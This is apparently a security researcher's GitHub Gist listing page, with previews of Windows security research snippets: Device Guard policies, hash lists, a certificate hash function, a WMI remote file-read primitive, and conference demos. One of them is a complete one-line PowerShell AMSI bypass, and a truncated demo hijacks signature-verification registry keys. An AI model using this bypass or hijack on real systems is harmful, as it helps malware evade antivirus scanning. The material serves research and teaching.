Matt Graeber mattifestation
mattifestation
/ amsibypass.ps1
Created
July 17, 2017 22:54
Compels AmsiScanBuffer/AmsiScanString to return E_INVALIDARG
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) |
mattifestation
/ CatalogStoreHashes.csv
Last active
July 25, 2017 15:34
Unique system catalog store hashes on Win 10
We can't make this file beautiful and searchable because it's too large.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "Algorithm","FileHash" | |
| "SHA1","00083ACBE326F29CE6B4900869426640FFC1F14D" | |
| "SHA1","008BE24EDEA854743622BD1EE748D85E9B5402C8" | |
| "SHA1","00953C7E137E01D555EDA3968610355E9CBCDF71" | |
| "SHA1","010009033B9E03BA22C311A4284E673BA6394972" | |
| "SHA1","01396BB9E2633BC0DF02F4456D00791CEC0386A6" | |
| "SHA1","0190ECC0144AC48107208CD8F82CE84F9853DB23" | |
| "SHA1","01914EC642D0439572E204EFF8A235526B7365A3" | |
| "SHA1","0199A56244408EFBD2B1A92E2FF79B1C0A63BCD4" | |
| "SHA1","01C270EB9A5B431C38D2375769E7BC99A0049FBC" |
mattifestation
/ CIPolicy_Schema_diff.txt
Created
August 2, 2017 18:47
Brief description (and speculation) of new additions to the Device Guard configurable CI schema.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Signer: | |
| * Supports a "SignTimeAfter" element which presumably only permits the signer rule to apply if the certificate was signed after the specified date. IDK about the rationale behind that (except for maybe "well-known" types) since a cert TBS hash takes the validity period into consideration | |
| Macros: | |
| * These are entirely new and appear to be used for text substitution which might come in handy for maintaining multiple SI policies. | |
| SidType: | |
| * This isn't actually used anywhere but perhaps this could be a prelude to user/group-specific rules in a future version? If this happened, then Device Guard would have the one feature that was nice in AppLocker. | |
| FilePathType: |
mattifestation
/ FileReadPrimitive.ps1
Last active
June 12, 2023 16:33
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $CimSession = New-CimSession -ComputerName 10.0.0.2 | |
| $FilePath = 'C:\Windows\System32\notepad.exe' | |
| # PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
| $PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
| $InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
| $FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
| $FileLengthBytes = $FileContents.FileData[0..3] | |
| [Array]::Reverse($FileLengthBytes) |
mattifestation
/ wincertificate.bt
Last active
July 5, 2024 12:44
Simple 010 Editor template to parse an embedded WIN_CERTIFICATE structure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //------------------------------------------------ | |
| //--- 010 Editor v7.0 Binary Template | |
| // | |
| // File: | |
| // Authors: Matt Graeber (@mattifestation) | |
| // Version: | |
| // Purpose: | |
| // Category: | |
| // File Mask: | |
| // ID Bytes: |
mattifestation
/ dbxhashoutput.csv
Created
September 3, 2017 17:49
A basic "dbx" UEFI variable parser to dump blacklisted UEFI bootloader hashes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SignatureOwner | SHA256Hash | |
|---|---|---|
| 00000000-0000-0000-0000-000000000000 | 6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 80B4D96931BF0D02FD91A61E19D14F1DA452E66DB2408CA8604D411F92659F0A | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | F52F83A3FA9CFBD6920F722824DBE4034534D25B8507246B3B957DAC6E1BCE7A | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | C5D9D8A186E2C82D09AFAA2A6F7F2E73870D3E64F72C4E08EF67796A840F0FBD | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 363384D14D1F2E0B7815626484C459AD57A318EF4396266048D058C5A19BBF76 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 1AEC84B84B6C65A51220A9BE7181965230210D62D6D33C48999C6B295A2B0A06 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | E6CA68E94146629AF03F69C2F86E6BEF62F930B37C6FBCC878B78DF98C0334E5 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | C3A99A460DA464A057C3586D83CEF5F4AE08B7103979ED8932742DF0ED530C66 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 58FB941AEF95A25943B3FB5F2510A0DF3FE44C58C95E0AB80487297568AB9771 |
mattifestation
/ BaseEnforcementPolicy.xml
Last active
March 5, 2021 16:31
A Device Guard policy in enforcement mode that just works. It permits execution of only enough to boot the OS, run Windows code, and run Store apps.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
| <VersionEx>10.0.0.0</VersionEx> | |
| <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
| <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
| <Rules> | |
| <Rule> | |
| <Option>Enabled:Unsigned System Integrity Policy</Option> | |
| </Rule> | |
| <Rule> |
mattifestation
/ CertTBSHash.ps1
Created
September 7, 2017 01:13
Calculates a ToBeSigned hash of a certificate, producing the same uniquely identifying hash present in code integrity rule sets.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Example: ls 'C:\Windows\System32\*' -Include '*.dll' | Get-AuthenticodeSignature | Select -ExpandProperty SignerCertificate | Get-TBSHash | |
| filter Get-TBSHash { | |
| [OutputType([String])] | |
| param ( | |
| [Parameter(Mandatory, ValueFromPipeline)] | |
| [Security.Cryptography.X509Certificates.X509Certificate2] | |
| $Certificate | |
| ) |
mattifestation
/ SignatureVerificationAttack.ps1
Created
September 22, 2017 16:10
Demos from my DerbyCon keynote
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Host.Runspace.LanguageMode | |
| Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
| Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
| # Try to execute the script. Add-Type will fail. | |
| Import-Module C:\Demo\bypass_test.psm1 | |
| $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
| '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
mattifestation
/ WDAG_CI_Policy.xml
Created
October 18, 2017 21:59
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy"> | |
| <VersionEx>10.0.0.0</VersionEx> | |
| <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
| <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
| <Rules> | |
| <Rule> | |
| <Option>Enabled:UMCI</Option> | |
| </Rule> | |
| <Rule> |